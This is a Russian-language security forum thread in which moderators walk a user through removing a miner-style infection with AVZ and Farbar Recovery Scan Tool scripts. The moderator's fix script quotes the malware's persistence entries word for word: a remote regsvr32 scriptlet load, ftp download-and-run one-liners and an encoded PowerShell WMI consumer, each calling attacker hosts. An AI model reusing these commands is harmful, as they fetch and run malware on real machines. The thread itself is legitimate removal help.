Перейти к содержимому


Фотография
- - - - -

[РЕШЕНО] Как избавиться от процессов Mysa,1,2,3

Друзья!

 В данном разделе форума действуют дополнительные правила — тема «Общие правила раздела "Уничтожение вирусов"». Пожалуйста, ознакомьтесь с ними перед размещением любого сообщения в данном разделе.

Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».


  • Закрытая тема Тема закрыта
Сообщений в теме: 23

#1 OFF   Матвей Ульченко

Матвей Ульченко

    Новичок

  • Новички
  • Cообщений: 11

Отправлено 16 Апрель 2019 - 19:36

Здравствуйте, сегодня 16 апреля 2019 года обнаружил данный процесс musa 1 2 3 на своем ПК. У вас на сайте прочёл что это вирус , помогите избавиться .

Прикрепленные файлы


Сообщение отредактировал Матвей Ульченко: 16 Апрель 2019 - 19:49

  • 0

#2 OFF   Mark D. Pearlstone

Mark D. Pearlstone

    Assistant

  • Супер-модераторы
  • Совет фан-клуба
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 21 436

Награды

           

Отправлено 16 Апрель 2019 - 19:41

Порядок оформления запроса о помощи


  • 0

#3 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 14 359

Награды

           

Отправлено 16 Апрель 2019 - 20:05

Выполните скрипт в AVZ из папки Autologger
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
QuarantineFile('C:\Windows\System32\wbiosrvp.dll','');
 QuarantineFile('C:\Windows\System32\themctrl.dll','');
 QuarantineFile('C:\Windows\debug\item.dat','');
 DeleteFile('C:\Windows\debug\item.dat','32');
 DeleteFile('C:\Windows\System32\themctrl.dll','64');
 DeleteFile('C:\Windows\System32\wbiosrvp.dll','64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\wbiosrvp\Parameters','ServiceDll','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\themctrl\Parameters','ServiceDll','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ
begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip загрузите по ссылке https://virusinfo.in...s.php?tid=37678
Полученный после загрузки ответ сообщите здесь.

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

+ Сделайте лог TDSSkiller
  • 2
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif

#4 OFF   Матвей Ульченко

Матвей Ульченко

    Новичок

  • Новички
  • Cообщений: 11

Отправлено 16 Апрель 2019 - 21:03

Результат загрузки Файл сохранён как 190416_175013_quarantine_5cb615d522577.zip Размер файла 3216268 MD5 6f8284bbd4bd43016a01e2955b46e4e9

 

Прикрепленные файлы


  • 0

#5 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 14 359

Награды

           

Отправлено 16 Апрель 2019 - 21:06

Выполните скрипт в AVZ из папки Autologger
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('c:\windows\temp\conhost.exe','');
 TerminateProcessByName('C:\Windows\inf\lsmm.exe');
 QuarantineFile('C:\Windows\inf\lsmm.exe','');
 DeleteFile('C:\Windows\inf\lsmm.exe','32');
 DeleteFile('c:\windows\temp\conhost.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ
begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip загрузите по ссылке https://virusinfo.in...s.php?tid=37678
Полученный после загрузки ответ сообщите здесь.

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
  • 2
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif

#6 OFF   Матвей Ульченко

Матвей Ульченко

    Новичок

  • Новички
  • Cообщений: 11

Отправлено 16 Апрель 2019 - 21:18

Результат загрузки Файл сохранён как 190416_181427_quarantine_5cb61b8331136.zip Размер файла 759337 MD5 283b7687575fabd6eb8921f107885b6a
 

 

Прикрепленные файлы


  • 0

#7 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 14 359

Награды

           

Отправлено 16 Апрель 2019 - 23:09

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.
  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.
3munStB.png
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
  • 0
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif

#8 OFF   Матвей Ульченко

Матвей Ульченко

    Новичок

  • Новички
  • Cообщений: 11

Отправлено 17 Апрель 2019 - 01:10

Сделал 

Прикрепленные файлы


  • 0

#9 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 14 359

Награды

           

Отправлено 17 Апрель 2019 - 16:51

1. Выделите следующий код:
Start::
CreateRestorePoint:
2019-02-19 12:39 - 2019-04-16 23:45 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2019-03-04 18:34 - 2019-04-16 23:44 - 000000080 _____ C:\Windows\system32\s
2019-03-04 18:34 - 2019-04-16 23:44 - 000000078 _____ C:\Windows\system32\ps
2019-03-04 18:34 - 2019-04-16 23:44 - 000000076 _____ C:\Windows\system32\p
2019-03-04 18:29 - 2019-04-16 23:45 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe
2019-04-16 21:12 - 2019-04-16 23:46 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-04-16 21:12 - 2019-04-16 23:46 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-04-16 21:12 - 2019-04-16 23:46 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-04-16 21:12 - 2019-04-16 23:46 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-04-16 21:12 - 2019-04-16 23:46 - 000003186 _____ C:\Windows\System32\Tasks\ok
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
Task: {0C030FAE-3EC7-4DFD-97E4-5D01A9811954} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {77C89B29-5548-462B-86C0-052678BBF1F7} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {83761A7F-A43C-4A8E-810B-0A1926E4AE1F} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {BA0044BE-A915-4971-A0FD-BA9780C7E747} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {BFF224DA-CD77-47C4-B7CE-C2E419D825FC} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {E8549826-1A31-4FFC-8F35-9AE02D93FD6C} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {EA71F1DC-3103-49E2-B251-6021B28BC8A1} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION
Reboot:
End::
2. Скопируйте выделенный текст (правая кнопка мышиКопировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание: будет выполнена перезагрузка компьютера.

  • 0
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif

#10 OFF   Матвей Ульченко

Матвей Ульченко

    Новичок

  • Новички
  • Cообщений: 11

Отправлено 17 Апрель 2019 - 17:56

Сделал

Прикрепленные файлы

  • Прикрепленный файл  Fixlog.zip   1,9К   скачиваний 1

  • 0

#11 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 14 359

Награды

           

Отправлено 17 Апрель 2019 - 18:46

Проблема решена?
  • 0
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif

#12 OFF   Матвей Ульченко

Матвей Ульченко

    Новичок

  • Новички
  • Cообщений: 11

Отправлено 17 Апрель 2019 - 19:05

Как видимо нет , открыл планировщик заданий  там ещё находятся процессы mysa,1,2,3  и ok  

Прикрепленные файлы


  • 0

#13 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 14 359

Награды

           

Отправлено 17 Апрель 2019 - 20:13

Тогда еще раз сделайте лог TDSSkiller
  • 0
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif

#14 OFF   Матвей Ульченко

Матвей Ульченко

    Новичок

  • Новички
  • Cообщений: 11

Отправлено 17 Апрель 2019 - 20:59

Сделал

Прикрепленные файлы


  • 0

#15 OFF   thyrex

thyrex

    Абориген

  • Модераторы
  • Консультанты
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 14 359

Награды

           

Отправлено 17 Апрель 2019 - 21:15

А удалить буткит утилита разве не предлагает?
  • 0
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect



m4303.gif




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных